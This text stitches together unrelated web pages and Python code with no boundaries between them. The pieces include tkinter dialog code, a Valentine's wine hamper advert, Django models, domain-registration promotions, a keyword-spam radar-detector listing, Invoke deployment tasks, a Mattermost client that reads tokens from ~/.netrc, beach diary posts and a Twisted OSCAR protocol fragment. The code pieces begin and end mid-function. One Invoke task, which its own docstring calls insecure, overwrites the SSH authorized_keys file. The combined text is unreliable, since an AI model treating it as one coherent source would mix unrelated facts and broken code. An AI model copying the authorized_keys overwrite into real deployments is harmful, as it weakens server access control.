if fto.isAll(): ALL_filetypes_was_specified = True # remember this if fto == initialFileTypeObject: initialFileTypeObject.add(fto) # add fto to initialFileTypeObject else: filetypeObjects.append(fto) # ------------------------------------------------------------------ # make sure that the list of filetypes includes the ALL FILES type. # ------------------------------------------------------------------ if ALL_filetypes_was_specified: pass elif allFileTypeObject == initialFileTypeObject: pass else: filetypeObjects.insert(0, allFileTypeObject) # ------------------------------------------------------------------ # Make sure that the list includes the initialFileTypeObject # in the position in the list that will make it the default. # This changed between Python version 2.5 and 2.6 # ------------------------------------------------------------------ if len(filetypeObjects) == 0: filetypeObjects.append(initialFileTypeObject) if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]): pass else: if ut.runningPython27: filetypeObjects.append(initialFileTypeObject) else: filetypeObjects.insert(0, initialFileTypeObject) filetypes = [fto.toTuple() for fto in filetypeObjects] return initialbase, initialfile, initialdir, filetypes def __buttonEvent(event=None, buttons=None, virtual_event=None): """ Handle an event that is generated by a person interacting with a button. It may be a button press or a key press. """ # TODO: Replace globals with tkinter variables global boxRoot, __replyButtonText # Determine window location and save to global m = re.match("(\d+)x(\d+)([-+]\d+)([-+]\d+)", boxRoot.geometry()) if not m: raise ValueError( "failed to parse geometry string: {}".format(boxRoot.geometry())) width, height, xoffset, yoffset = [int(s) for s in m.groups()] st.rootWindowPosition = '{0:+g}{1:+g}'.format(xoffset, yoffset) # print('{0}:{1}:{2}'.format(event, buttons, virtual_event)) if virtual_event == 'cancel': for button_name, button in list(buttons.items()): if 'cancel_choice' in button: __replyButtonText = button['original_text'] __replyButtonText = None boxRoot.quit() return if virtual_event == 'select': text = event.widget.config('text')[-1] if not isinstance(text, ut.str): text = ' '.join(text) for button_name, button in list(buttons.items()): if button['clean_text'] == text: __replyButtonText = button['original_text'] boxRoot.quit() return # Hotkeys if buttons: for button_name, button in list(buttons.items()): hotkey_pressed = event.keysym if event.keysym != event.char: # A special character hotkey_pressed = '<{}>'.format(event.keysym) if button['hotkey'] == hotkey_pressed: __replyButtonText = button_name boxRoot.quit() return print("Event not understood") def __put_buttons_in_buttonframe(choices, default_choice, cancel_choice): """Put the buttons in the buttons frame """ global buttonsFrame, cancel_invoke # TODO: I'm using a dict to hold buttons, but this could all be cleaned up if I subclass Button to hold # all the event bindings, etc # TODO: Break __buttonEvent out into three: regular keyboard, default # select, and cancel select. unique_choices = ut.uniquify_list_of_strings(choices) # Create buttons dictionary and Tkinter widgets buttons = dict() for button_text, unique_button_text in zip(choices, unique_choices): this_button = dict() this_button['original_text'] = button_text this_button['clean_text'], this_button[ 'hotkey'], hotkey_position = ut.parse_hotkey(button_text) this_button['widget'] = Button(buttonsFrame, takefocus=1, text=this_button['clean_text'], underline=hotkey_position) this_button['widget'].pack( expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m') buttons[unique_button_text] = this_button # Bind arrows, Enter, Escape for this_button in list(buttons.values()): bindArrows(this_button['widget']) for selectionEvent in st.STANDARD_SELECTION_EVENTS: this_button['widget'].bind("<{}>".format(selectionEvent), lambda e: __buttonEvent( e, buttons, virtual_event='select'), add=True) # Assign default and cancel buttons if cancel_choice in buttons: buttons[cancel_choice]['cancel_choice'] = True boxRoot.bind_all('<Escape>', lambda e: __buttonEvent( e, buttons, virtual_event='cancel'), add=True) boxRoot.protocol('WM_DELETE_WINDOW', lambda: __buttonEvent( None, buttons, virtual_event='cancel')) if default_choice in buttons: buttons[default_choice]['default_choice'] = True buttons[default_choice]['widget'].focus_force() # Bind hotkeys for hk in [button['hotkey'] for button in list(buttons.values()) if button['hotkey']]: boxRoot.bind_all(hk, lambda e: __buttonEvent(e, buttons), add=True) return
This cheese and red wine hamper is an original Valentines gift. We have made it even more special than our other great wine and cheese gifts by creating a special front label, designed with a fun 'Be Mine' crossed out to 'Be Wine' message - which we think is better! The bottle of Spanish red wine is combined with two artisan made cheese truckles, a mature cheddar infused with port and brandy called Ruby Mist, and a mature Red Leicester (which is truly surprising in it's absolute deliciousness) plus sourdough crackers and a generous jar of handmade, real ale chutney. A winning combination! Just make sure you don't send it as a birthday present to your boss and start rumours!
import wx class VirtualList(wx.ListCtrl): def __init__(self, parent, **kwargs): super(VirtualList, self).__init__(parent, wx.ID_ANY, style=wx.LC_VIRTUAL | wx.LC_REPORT |\ wx.LC_VRULES | wx.LC_HRULES, **kwargs) self.data = None self.columns = [] def setData(self, data): self.data = data print data def RefreshAllItems(self): if self.data: if self.DeleteAllItems(): if self.DeleteAllColumns(): self.SetItemCount(len(self.data)) self.RefreshItems(0, len(self.data) - 1) return True return False def OnGetItemText(self, item, col): return self.data[item][col] def InsertColumns(self, columnList): self.columns = columnList for column in columnList: super(VirtualList, self).InsertColumn(\ columnList.index(column), column) def getColumnText(self, index): return self.columns[index]
Discounts for .COM.PE web domain registrations or renewals. Check below the prices and domain features offered for .COM.PE. .COM.PE is a country domain for Peru. This type of web domain can be registered for a period of 1 to 5 years. Using above partner promo code, you can claim up to 40% discounts on registration and renewals. The discount is offered based on the yearly accumulated cost for domains managed under Netim registry. Therefore, the more domains you register and maintain with Netim, the better the discount rates. For example, if you reached a 250 Euro expenditure / year, you will reach second level rates which bring in a 36% discount. For orders totaling over 750 Euro over a year, the discounts applied reach 40%. As Netim manages over 800 domain extensions, discounts are based on each each individual domain TLD type. .COM.PE web domain services and rates provided – further discounts may apply based on the above discount codes. Netim is a worldwide accredited registrar with a global offer of over 800 web domain extensions, with international and geographic reach. Registrations of .com.pe domains with Netim is quick and secure.
from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models from django.utils.translation import ugettext_lazy as _ from livinglots_organize.models import BaseOrganizer class OptedInStewardProjectManager(models.Manager): """ A manager that only returns StewardProject instances where the group asked to be included on the map. """ def get_queryset(self): return super(OptedInStewardProjectManager, self).get_queryset().filter( include_on_map=True, ) class StewardProjectMixin(models.Model): objects = models.Manager() opted_in = OptedInStewardProjectManager() project_name = models.CharField(_('project name'), max_length=256, help_text=_('The name of the project using this lot.'), ) use = models.ForeignKey('livinglots_lots.Use', limit_choices_to={'visible': True}, help_text=_('How is the project using the land?'), verbose_name=_('use'), ) support_organization = models.CharField(_('support organization'), max_length=300, blank=True, null=True, help_text=_("What is your project's support organization, if any?"), ) land_tenure_status = models.CharField(_('land tenure status'), choices=( ('owned', _('project owns the land')), ('licensed', _('project has a license for the land')), ('lease', _('project has a lease for the land')), ('access', _('project has access to the land')), ('not sure', _("I'm not sure")), ), default=_('not sure'), max_length=50, help_text=_('What is the land tenure status for the project? (This ' 'will not be shared publicly.)'), ) include_on_map = models.BooleanField(_('include on map'), default=True, help_text=_('Can we include the project on our map?'), ) class Meta: abstract = True class BaseStewardProject(StewardProjectMixin): started_here = models.BooleanField(default=False) content_type = models.ForeignKey(ContentType, related_name='+') object_id = models.PositiveIntegerField() content_object = GenericForeignKey('content_type', 'object_id') class Meta: abstract = True class BaseStewardNotification(StewardProjectMixin, BaseOrganizer): """ A notification from someone who is part of a stewarding project letting us know that they are stewards on a given lot. """ class Meta: abstract = True def __unicode__(self): return self.name
Kerry Winfrey is the author of LOVE AND OTHER ALIEN EXPERIENCES and THINGS JOLIE NEEDS TO DO BEFORE SHE BITES IT. She’s written for many websites, including HelloGiggles. When she’s not writing, she’s most likely baking yet another batch of cookies or watching far, far too many romantic comedies. She lives with her husband, baby, and dog in the middle of Ohio.
# -*- coding: utf-8 -*- # # This software is licensed as described in the file license.txt, which # you should have received as part of this distribution. from core import * class InstancePool(object): """ Container for instances of Instance and Entity, that provides some utility methods to search through them. """ def __init__(self): self._items = [] # Handle special case of the top-most classes of the instantiation chain (Entity and Instance). # They are not loaded explicitly, and are always available from any pool. self.add(Entity) self.add(Instance) def add(self, instance): id = instance.get_id() if not id is None and not self.get_item(id) is None: # raising an exception is an option. an alternative would be to silently replace the instance with the one # being loaded, but there may be implications when working with multiple versions of a same instance raise Exception("Instance with id '%s' already exists in the pool" % (instance.get_id(),)) self._items.append(instance) def remove(self, item): self._items.remove(item) def get_item(self, id): assert(not id is None) for item in self._items: if item.get_id() == id: return item return None def get_items(self, levels=(0,1,2), base_name=None): result = self._items if not levels == (0,1,2): result = [item for item in result if isinstance(item, Instance) and 0 in levels or isinstance(item, Entity) and 1 in levels or item in (Entity, Instance) and 2 in levels] if not base_name is None: base = self.get_item(base_name) result = [item for item in result if isinstance(item, Entity) and len(item.__bases__) > 0 and item.__bases__[0] is base] return result def get_instances_of(self, spec_name, direct_instances_only=False): assert(not spec_name is None) if direct_instances_only: return [item for item in self._items if hasattr(item.__class__, 'name') and item.__class__.name == spec_name] else: spec_and_childs = self.get_spec_and_child_specs(spec_name) return [item for item in self._items if item.__class__ in spec_and_childs] def get_spec_and_child_specs(self, spec_name): inh_chain = current = [self.get_item(spec_name)] while True: childs = [self.get_items(base_name=spec.get_name()) for spec in current] current = [child for sublist in childs for child in sublist] if len(current) == 0: break inh_chain.extend(current) return inh_chain def get_possible_domains(self): pool = self possible_domains = {'string':'string'} possible_domains.update(dict([(i.get_identifier(), i.get_name()) for i in pool.get_items(levels=(1,))])) return possible_domains
newnewnew TRAVEL 23 uNiT Price — iNcludiNG YOur lOGO cOde PrOducT QuANTiTY 50+ 100+ 250+ 500+ J2300 Meridian Travel wallet (printed) $12.44 $9.89 $9.23 $ call J2300 Meridian Travel wallet (engraved on accent plate) $12.08 $10.70 $10.11 $ call G3690 everest first Aid Kit na $6.62 $5.64 $ call G3300 escape Travel Pack $8.92 $7.53 $6.48 $ call Pen additional Optional laser engraving on accent plate Meridian Travel Wallet (J2300) This soft grain finish zippered travel wallet makes the ideal travel companion. Features include a passport pocket, multiple card pockets, ticket flap, security compar tment with zip and pen loop. Your logo can be printed onto the wallet or engraved on the brushed chrome accent plate. Product size: 13cm x 24.5cm high Imprint method: Pad print (laser engrave optional) Imprint area: Pad print: 30mm x 45mm wide Laser engrave: 8mm x 28mm wide (on accent plate) Optional printing on back Everest First Aid kit (G3690) This go-anywhere first aid kit contains adhesive bandages, wipes, tweezers and much more....all supplied in a protective water resistant case. Imprint method: Pad print Imprint area: 18mm x 45mm wide (front) or 30mm x 45mm wide (back) Escape Travel Pack (G3300) This must-have travel pack contains every thing you will ever need for your next trip away. It includes an inflatable neck pillow, eye covers, ear plugs and a combination travel lock all securely packed into a transparent zippered pouch. Imprint method: Pad print Imprint area: 15mm x 60mm wide There is a setup charge of $75.00 . Prices include laser engraving or one colour printing in one position as indicated. Please add 10% GST to all prices. Prices are subject to change without notice. Please check our website for current prices (www.primepromotional.com.au).
"""This file is part of matrix2latex. matrix2latex is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. matrix2latex is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with matrix2latex. If not, see <http://www.gnu.org/licenses/>. """ import re def fix(s, table=False): """ input: (string) s output: (string) s takes any number in s and replaces the format '8e-08' with '8\e{-08}' """ i = re.search('e[-+]\d\d', s) while i != None: before = s[0:i.start()] number = s[i.start()+1:i.start()+4] after = s[i.end():] if table: num = "%(#)+03d" % {'#': int(number)} else: num = "%(#)3d" % {'#': int(number)} s = '%s\\e{%s}%s' % (before, num, after) i = re.search('e[-+]\d\d', s) return s
Lane change assistant. Item length: Item type: Item model: Weight : Led display / motion detection. Laser / strelka: As944. Wholesale alarm car. Tmps. Current & voltage display. Car dvr radar detector. Laser detection: Special features 2: Wholesale laser radar. Russia,english,japanese,korean. 5.5inch. Transmission power : Kl 554Winsen. Alarm system and securityHigh quality abs + pc. Fr remote-controller. Trinidad wolf. Ai car fun. Car mount camera. 450mah. 90 degrees laser. Ccc, ce, rosh. Wholesale beltronics radar. Lanuage: About 195 g. Leading you to drive safely and traffic fine. Features 2: Car radar detector,dvr. Speedcam: Gps logger. Xrs9880 full band. Radar detector. 89341-12100. Special feature: Md3010 detector. Automobile brake oil testing pen. Electric switch. Wholesale military brassards. Lithuanian. Projector car speedometer. Levels laser. English/polish/spanish/danish ect.. Origin: Sikeo. Dot5 brake fluid. Radar scanning. City 200-800m ; highway 1000-1500m. Car satellite. Atian. Sensor number: Receiving frequency range: : Gold detector and diamond. Signal police. Full hd parking. 71.2x31.8x11.3mm. Sku : Sequence bag. Cover the key of car. Av-out. Lcd display screen : Russian version. Shimano deore m595. Artou.
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals from frappe.utils.minify import JavascriptMinify """ Build the `public` folders and setup languages """ import os, sys, frappe, json, shutil from cssmin import cssmin def bundle(no_compress, make_copy=False, verbose=False): """concat / minify js files""" # build js files make_asset_dirs(make_copy=make_copy) build(no_compress, verbose) def watch(no_compress): """watch and rebuild if necessary""" import time build(no_compress=True) while True: if files_dirty(): build(no_compress=True) time.sleep(3) def make_asset_dirs(make_copy=False): assets_path = os.path.join(frappe.local.sites_path, "assets") for dir_path in [ os.path.join(assets_path, 'js'), os.path.join(assets_path, 'css')]: if not os.path.exists(dir_path): os.makedirs(dir_path) # symlink app/public > assets/app for app_name in frappe.get_all_apps(True): pymodule = frappe.get_module(app_name) source = os.path.join(os.path.abspath(os.path.dirname(pymodule.__file__)), 'public') target = os.path.join(assets_path, app_name) if not os.path.exists(target) and os.path.exists(source): if make_copy: shutil.copytree(os.path.abspath(source), target) else: os.symlink(os.path.abspath(source), target) def build(no_compress=False, verbose=False): assets_path = os.path.join(frappe.local.sites_path, "assets") for target, sources in get_build_maps().iteritems(): pack(os.path.join(assets_path, target), sources, no_compress, verbose) shutil.copy(os.path.join(os.path.dirname(os.path.abspath(frappe.__file__)), 'data', 'languages.txt'), frappe.local.sites_path) # reset_app_html() def get_build_maps(): """get all build.jsons with absolute paths""" # framework js and css files pymodules = [frappe.get_module(app) for app in frappe.get_all_apps(True)] app_paths = [os.path.dirname(pymodule.__file__) for pymodule in pymodules] build_maps = {} for app_path in app_paths: path = os.path.join(app_path, 'public', 'build.json') if os.path.exists(path): with open(path) as f: try: for target, sources in json.loads(f.read()).iteritems(): # update app path source_paths = [] for source in sources: if isinstance(source, list): s = frappe.get_pymodule_path(source[0], *source[1].split("/")) else: s = os.path.join(app_path, source) source_paths.append(s) build_maps[target] = source_paths except Exception, e: print path raise return build_maps timestamps = {} def pack(target, sources, no_compress, verbose): from cStringIO import StringIO outtype, outtxt = target.split(".")[-1], '' jsm = JavascriptMinify() for f in sources: suffix = None if ':' in f: f, suffix = f.split(':') if not os.path.exists(f) or os.path.isdir(f): print "did not find " + f continue timestamps[f] = os.path.getmtime(f) try: with open(f, 'r') as sourcefile: data = unicode(sourcefile.read(), 'utf-8', errors='ignore') extn = f.rsplit(".", 1)[1] if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f): tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO() jsm.minify(tmpin, tmpout) minified = tmpout.getvalue() outtxt += unicode(minified or '', 'utf-8').strip('\n') + ';' if verbose: print "{0}: {1}k".format(f, int(len(minified) / 1024)) elif outtype=="js" and extn=="html": # add to frappe.templates content = data.replace("\n", " ").replace("'", "\'") outtxt += """frappe.templates["{key}"] = '{content}';\n""".format(\ key=f.rsplit("/", 1)[1][:-5], content=content) else: outtxt += ('\n/*\n *\t%s\n */' % f) outtxt += '\n' + data + '\n' except Exception, e: print "--Error in:" + f + "--" print frappe.get_traceback() if not no_compress and outtype == 'css': pass #outtxt = cssmin(outtxt) with open(target, 'w') as f: f.write(outtxt.encode("utf-8")) print "Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024))) def files_dirty(): for target, sources in get_build_maps().iteritems(): for f in sources: if ':' in f: f, suffix = f.split(':') if not os.path.exists(f) or os.path.isdir(f): continue if os.path.getmtime(f) != timestamps.get(f): print f + ' dirty' return True else: return False
The Bikini Girl from Italy with the second bag, full of rubbish. Chicken wings in a re-usable container? Madness! This could be the most important photo you see all year! My heart was pounding and I hid under my hat like a criminal who was planning to commit a crime as I waited for the queue to disperse in front of the deli counter in a supermarket. When it was all clear, I chose an employee who looked kind and competent and gingerly asked if I could buy 2 kilos of uncooked chicken wings and have them put straight into my re-usable container. The lady behind the counter looked startled and said she had to ask the manager, she returned a few minutes later saying it was OK. She set the scales to deduct the weight of the container and stuck the barcode sticker straight onto the outside of my re-usable plastic container, which I then scanned at the self-serve terminal. I feel like I have just changed the world. Stay tuned for more plastic reduction updates. Three baby mice found and photographed by the author.
# -*- coding:utf8 -*- from django import template from django.db.models import Q from icomments.models import Comments from icomments.forms import ComForm register = template.Library() def show_comment(value): ''' 文章评论 ''' comform = ComForm() # 获取已批准或隐藏的评论 comments = Comments.objects.filter(Q(approved=0)|Q(approved=3)).filter(post_id=value) # 构造嵌套评论 dic={i.id:[i.id,i.parent,[],0,i] for i in comments} stack=[] for c in dic: i=dic[c] pid=i[1] if pid!=0 and dic.get(pid)!=None: p=dic[pid] p[2].append(i) i[3]=p[3]+1 else: stack.insert(0,i) result=[] while stack: top=stack.pop() result.append(top[4]) top[2].reverse() stack.extend(top[2]) comments = result return {'comments':comments,'comform':comform,'comment_post_id':value} register.inclusion_tag('icomments/comment.html')(show_comment) def show_latest_comment(): comments = Comments.objects.filter(Q(parent=0)&Q(approved=0))[:5] return {'comments':comments} register.inclusion_tag('icomments/comment_latest.html')(show_latest_comment)
These resources are good for people who have had some experience in programming. The list of resources has a strong focus on the client-side (browser) programming but some bits cover the server-side (NodeJS) programming too. These resources can be used concurrently. There is no need to do the online course first or start with the books only. The other notable reference sites are Web Platform, Can I use and DevDocs. All modern browsers have built-in debuggers that show currently loaded resources (scripts, css, images, cookies fonts, etc), network requests, console output, script errors etc. It is essential to learn to use the debugger as soon as possible so you can inspect script errors and not waste time trying to guess them (as it was in the development process on IE7 in the darker times). Further references for Chrome can be found from here and for Firefox from here.
#!/usr/bin/python # -*- encoding: utf-8 -*- ################################################################################ # # Copyright (C) 2010 - 2015 Dharmesh Patel <[email protected]>. # $Id$ # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ################################################################################ name = 'shoppingCart' version = '1.4.2' major_version = '1' description = 'shoppingCart is a open source cart developed using Python language to manage cart in Ecommerce applications.' long_description= """ Majour Feature(s): 1. Product options support. 2. Multi discount support. 3. Multi tax support(specific to product as well as general taxes). 4. Multi currency support. 5. Tax Exclude and Include total. 6. Shipping method and charge. """ classifiers = [ "Development Status :: 5 - Production/Stable", "License :: OSI Approved :: BSD License", "Programming Language :: Python" ] url = 'https://github.com/dharmeshpatel/shoppingcart' author = 'Dharmesh Patel' author_email = 'mr[dot]dlpatel[at]gmail[dot]com' copyright = 'Copyright (c) 2010 - 2015 Dharmesh Patel' license = 'BSD' # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
Publisher’s Note: SNS members have been watching the world of paying electronically for a decade or more, from Smartcards (an early Japanese success story, vs. the U.S.) to Paying by Cellphone (also pioneered commercially here, although invented in Finland). Members also know that this trend is ready to move from Asia to the U.S. and Europe, and that it will involve the handling of billions of dollars in transactions, and may lead to a redefinition of how banking, bank cards, and cellular networks make their money. William Saito has been kind enough to take time from his duties as CEO of Intecur to lay out the current landscape of electronic transactions in Asia. Despite cultural and use differences, members can be assured that some version of what they read here is already on its way to adoption in Europe and the U.S. Those who get in front of this trend will benefit hugely; those who ignore it will be at risk. This trend represents a deep structural change in the financial world. — mra.
import os import subprocess import shlex from invoke import task, run from invoke.exceptions import Failure YOUR_APP_NAME = "threepanel" HOME_PATH = os.environ['HOME'] DJANGO_PATH = os.path.join(HOME_PATH, 'vagrant_django', YOUR_APP_NAME) SCRIPTS_PATH = os.path.join(HOME_PATH, 'vagrant_django', 'scripts') UWSGI_LOG_PATH = os.path.join(HOME_PATH, 'logs', 'uwsgi.log') UWSGI_SH_PATH = os.path.join(HOME_PATH, 'uwsgi.sh') UWSGI_PID_PATH = os.path.join(HOME_PATH, 'uwsgi.pid') def python(): thing = run("python --version") if str(thing.stdout).startswith("Python 3."): return "python" else: return "python3" def background(cmd): subprocess.Popen(shlex.split(cmd)) def multiple(*args): return " && ".join(args) @task def home(command, *args, **kwargs): """ Run a command from the base django directory """ return run(multiple("cd {}".format(DJANGO_PATH), command), *args, **kwargs) @task def test(): """ Run all the tests. """ return dj("test images dashboard comics") @task def lint(): """ Run the PEP8 and Pyflakes linters """ return home("pylint *") @task def search(stuff): """ Ack around for stuff """ return home("ack {}".format(stuff)) @task def dj(command, *args, **kwargs): """ Run a django manage.py command """ return home("{} manage.py {}".format(python(), command), *args, **kwargs) @task() def runserver(): """ Run a django development server """ print("Running server on localhost:8080 (Vagrant Host:18080)") return dj("runserver 0:8080", pty=True) @task() def dev_start(): """ Run a django development server """ return runserver() @task def makemigrations(): """ Prep the prepping of the database """ return dj("makemigrations") @task def collectstatic(): """ Collect all of the static files from the django codebase and plop them in the STATIC_ROOT defined in settings.py """ return dj("collectstatic --clear --noinput") @task def migrate(): """ Prep the database """ return dj("migrate") @task def auth_keys(): """ Do something insecure and terrible """ return run("python3 /home/vagrant/vagrant_django/keys.py > ~/.ssh/authorized_keys") @task() def dump(): """ Dump the Postgres DB to a file. """ print("Dumping DB") run("dos2unix {}/backup_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/backup_postgres.sh".format(SCRIPTS_PATH)) @task() def restore(filename): """ Restore the Postgres DB from a file. hey, past Curtis, does this actually work? be honest """ print("Dumping DB") dump() print("Destrying DB") run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH)) print("Restoring DB from file: {}".format(filename)) run("dos2unix {}/rebuild_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/rebuild_postgres.sh {}".format(SCRIPTS_PATH, filename), echo=True) @task() def clear(): """ Destroy and recreate the database """ print("Resetting db") dump() run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH)) dj("makemigrations") dj("migrate --noinput") #dj("testdata") @task def uwsgi(): """ Activate the Python Application Server. """ print("writing logs to {}".format(UWSGI_LOG_PATH)) print("writing pidfile to {}".format(UWSGI_PID_PATH)) background("bash {}/uwsgi.sh".format(SCRIPTS_PATH)) @task def kill_uwsgi(): if os.path.exists("{}/uwsgi.pid".format(HOME_PATH)): print("Killing UWSGI...") return run("kill `cat {}/uwsgi.pid`".format(HOME_PATH), pty=True) print("UWSGI Dead...") else: print("UWSGI not running!") @task def celery(): """ Activate the task running system. """ print("Activating celery worker.") background("bash {}/celery.sh".format(SCRIPTS_PATH)) @task def kill_celery(): if os.path.exists("{}/celery.pid".format(HOME_PATH)): print("Killing Celery...") return run("kill `cat {}/celery.pid`".format(HOME_PATH), pty=True) print("Celery Dead...") else: print("Celery not running!") @task def postgres(): print("Starting Postgres...") return run("sudo service postgresql start") @task def kill_postgres(): print("Killing Postgres...") return run("sudo service postgresql stop") @task def nginx(): print("Starting Nginx...") return run("sudo service nginx start") @task def kill_nginx(): print("Killing Nginx...") return run("sudo service nginx stop") @task def redis(): print("Starting Redis...") return run("sudo service redis-server start") @task def kill_redis(): print("Killing Redis...") return run("sudo service redis-server stop") @task def restart_syslog(): print("Restarting Syslog...") return run("sudo service rsyslog restart") @task def remote_syslog(): """ Activate remote_syslog to pull celery logs to papertrail. """ print("Activating remote_syslog.") background("bash {}/remote_syslog.sh".format(SCRIPTS_PATH)) @task def kill_remote_syslog(): if os.path.exists("{}/remote_syslog.pid".format(HOME_PATH)): print("Killing Remote Syslog...") return run("kill `cat {}/remote_syslog.pid`".format(HOME_PATH), pty=True) print("Remote Syslog Dead...") else: print("Remote Syslog not running!") @task def prod_start(): """ Start all of the services in the production stack""" collectstatic() postgres() uwsgi() celery() nginx() redis() restart_syslog() return remote_syslog() @task def prod_stop(): """ Stop all of the services in the production stack""" kill_postgres() kill_uwsgi() kill_celery() kill_nginx() kill_remote_syslog() return kill_redis() @task def prod_restart(): """ Restart all of the services in the production stack """ prod_stop() return prod_start()
Beautiful breeze out of the West today. It was great weather today, building my castle. Caleb and Kristine, 8 year old twins, worked with their brother, Davey, 5 years old, and made a great castle. They are from Lancaster County, Pennsylvania. Here’s my castle today, but I just got the bad news that it was destroyed before sunset tonight. I am going home tomorrow, and won’t build tomorrow, but will be back Tuesday, and hopefully will build again. Jeremy built a great castle in record time! His mom said they had to leave in 20 minutes, and he wasted no time! He’s 12, and lives in Port Tobacco, Maryland. Amelia built her first castle today. She’s 8, lives in Lewes, and was here with her Grandma Sue, who is from Greenfield, Massachusetts. Even though thunder chased me (and everyone else, I did get to meet a girl I taught last year. Ashley 11, was with her mom, and brought her friend, Scarlett, also 11. They were really trying to get a castle built in between threatening storms! I also met 3 friends from Pennsylvania only here for the weekend. Kira, Tabitha, and one more friend whom i didn’t get a chance to meet. Beautiful, personable girls, who were fun to talk with- I only wish the weather would have cooperated! Friday’s castle, with new friends. I know how to build castles, but not how to make these pictures behave. Here are new friends Max and his Aunt Janice, with my castle today. First castle of the summer for me. I met a sweet 6 year old, Amelia, from connecticut today,and showed herall I know about castles. Really looking forward to August! I am really looking forward to building sand castles August 7th to the 23rd! I will return for one more week on on September 11th till the 18th. I hope to see you all then!
# A simple example to retrieve all users for a team while using a _token_ # from the .netrc file instead of a password (as requests assumes by default) import logging import requests import netrc from mattermostdriver import Driver logging.basicConfig( format='%(levelname)s - %(name)s - %(asctime)s - %(message)s' ) logger = logging.getLogger( 'MattermostManager' ) logger.setLevel( logging.INFO ) # requests overrides the simple authentication token header if it finds the entry in # the ~/.netrc file. Since we want to use ~/.netrc to retrieve the _token_, we need # to provide our own Authenticator class: class TokenAuth( requests.auth.AuthBase ) : def __call__( self, r ) : # Implement my authentication mmHost = 'mattermost.host.in.netrc' (login, account, password) = netrc.netrc().authenticators( mmHost ) r.headers[ 'Authorization' ] = "Bearer %s" % password return r class MattermostManager( object ) : def __init__( self ) : # Get the _token_ (as "password") from the ~/.netrc file. # the corresponding line in the file should look like: # <mattermost.host.in.netrc> foo foo <long-string-of-token> # The "login" and "account" (both set to "foo" in the example are ignored) mmHost = 'mattermost.host.in.netrc' (login, account, password) = netrc.netrc().authenticators( mmHost ) logger.debug( "Going to set up driver for connection to %s " % (mmHost,) ) self.mmDriver = Driver( options={ 'url' : mmHost, 'scheme' : 'https', 'port' : 443, 'auth' : TokenAuth, # use the new Authenticator class defined above } ) self.mmDriver.users.get_user( user_id='me' ) def getTeamMembers( self, teamName ) : # for restricted teams, we need to get the ID first, and # for this, we need to have the "name" (as in the URL), not # the "display name", as shown in the GUIs: team0 = self.mmDriver.teams.get_team_by_name( teamName ) logger.debug( 'team by name %s : %s' % (teamName, team0) ) teamId = team0[ 'id' ] team = self.mmDriver.teams.check_team_exists( teamName ) logger.debug( 'team %s - exists: %s' % (teamName, team[ 'exists' ]) ) if not team[ 'exists' ] : logger.error( 'no team with name %s found' % teamName ) return logger.debug( 'found team %s: %s' % (teamName, self.mmDriver.teams.get_team( teamId )) ) users = self._getAllUsersForTeam( teamId ) logger.debug( 'found %s users for team "%s"' % (len( users ), teamName) ) return users def _getAllUsersForTeam( self, teamId ) : # get all users for a team # with the max of 200 per page, we need to iterate a bit over the pages users = [ ] pgNo = 0 teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId, 'page' : str( pgNo ), 'per_page' : 200, } ) while teamUsers : users += teamUsers pgNo += 1 teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId, 'per_page' : 200, 'page' : str( pgNo ), } ) return users if __name__ == '__main__' : mmM = MattermostManager() mmM.getTeamMembers( 'myTeam' )
Which would be a suitable alternative for the common idiom "The devil is in the details", without the use of the word "devil"? Alternative answers are welcome too! The idiom the devil is in the details means that mistakes are usually made in the small details of a project. Usually it is a caution to pay attention to avoid failure. The devil version of the idiom is a variation on the God phrase, though the exact origin of both is uncertain. would convey what you mean. How “Devil may care” is different from “After me the deluge”? What is the meaning of the expression “handsome devil”? Is the term “expendable capital” superfluous? An idiom describing the end of argument?
# -*- test-case-name: twisted.words.test -*- # Copyright (c) 2001-2008 Twisted Matrix Laboratories. # See LICENSE for details. """ An implementation of the OSCAR protocol, which AIM and ICQ use to communcate. Maintainer: Paul Swartz """ import struct import string import socket import random import types import re from twisted.internet import reactor, defer, protocol from twisted.python import log from twisted.python.hashlib import md5 def logPacketData(data): lines = len(data)/16 if lines*16 != len(data): lines=lines+1 for i in range(lines): d = tuple(data[16*i:16*i+16]) hex = map(lambda x: "%02X"%ord(x),d) text = map(lambda x: (len(repr(x))>3 and '.') or x, d) log.msg(' '.join(hex)+ ' '*3*(16-len(d)) +''.join(text)) log.msg('') def SNAC(fam,sub,id,data,flags=[0,0]): header="!HHBBL" head=struct.pack(header,fam,sub, flags[0],flags[1], id) return head+str(data) def readSNAC(data): header="!HHBBL" head=list(struct.unpack(header,data[:10])) return head+[data[10:]] def TLV(type,value): header="!HH" head=struct.pack(header,type,len(value)) return head+str(value) def readTLVs(data,count=None): header="!HH" dict={} while data and len(dict)!=count: head=struct.unpack(header,data[:4]) dict[head[0]]=data[4:4+head[1]] data=data[4+head[1]:] if not count: return dict return dict,data def encryptPasswordMD5(password,key): m=md5() m.update(key) 